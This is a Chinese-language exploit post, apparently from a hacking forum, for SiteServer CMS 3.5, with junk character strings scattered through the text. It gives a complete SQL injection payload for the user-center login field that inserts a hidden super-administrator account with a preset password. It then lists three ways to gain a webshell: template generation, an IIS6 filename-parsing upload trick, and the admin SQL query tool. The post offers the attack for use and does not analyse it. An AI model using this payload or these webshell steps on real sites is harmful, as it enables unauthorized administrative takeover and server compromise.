SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版

1 `: G. F& p8 \, H' qstieserver官网:www.siteserver.cn
5 c$ D9 w5 G0 {

" V" h7 Q. h0 X. l2 i/ f
EXP:
' M3 a* Z2 a3 |0 O* G2 E
. |9 R/ l! x7 m: k: E" A" Q直接访问UserCenter/login.aspx


9 U* E% N4 `2 B: z) i
用户名处输入：

8 k* H& y0 w, F: Q3 u123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
( Y1 m6 B& w5 f( ?
$ L6 L% Y8 {$ _; f" o& p
' m/ n3 `# i2 R
) W. w* e( h. U0 j密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。

; m  c% e# q! Y" h$ D  {# g/ B# I
; `5 k* V: }& w
2 [; _) P: l. d$ f+ N7 Q之后再访问后台SiteServer/login.aspx用插入的用户登陆
; Y5 V/ _5 O9 v& M* s# P

9 Q. l/ o* i% l5 W* T+ D
% k9 h7 I' Q" g9 i后台拿webshell的三种方法：

& a) l' v, S# k7 D$ H! M一、

4 j: F7 ?8 a+ t! E8 A站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
1 V% W" Y8 M' Z3 o' Z+ x0 R! N
+ b# c# o) B; h6 t二、

2 ]7 [! a# k9 q- z5 `; ?成员权限-》添加用户-》用户名为：1.asp

1 v9 Y! ^& k5 |& h2 m0 I% Nhttp://127.0.0.1/usercenter/

用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell

% b! f1 Y# l/ o4 ^: ]" O2 _1 X" N（ps：后台添加用户时不会验证是否含有非法字符）
/ c# }/ b8 n# N$ Y
三、
7 Y( T; [6 ^9 r: g
* h5 _0 l) ^6 j& y4 C$ E3 C系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径
$ E5 H, d  |/ S4 l1 ^9 C$ ]- G6 e
系统工具-》数据库工具-》SQL语句查询
这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。
! \+ U4 F  m! a( f# Z* V1 \* F
; v0 B# c# H" d) _% E3 O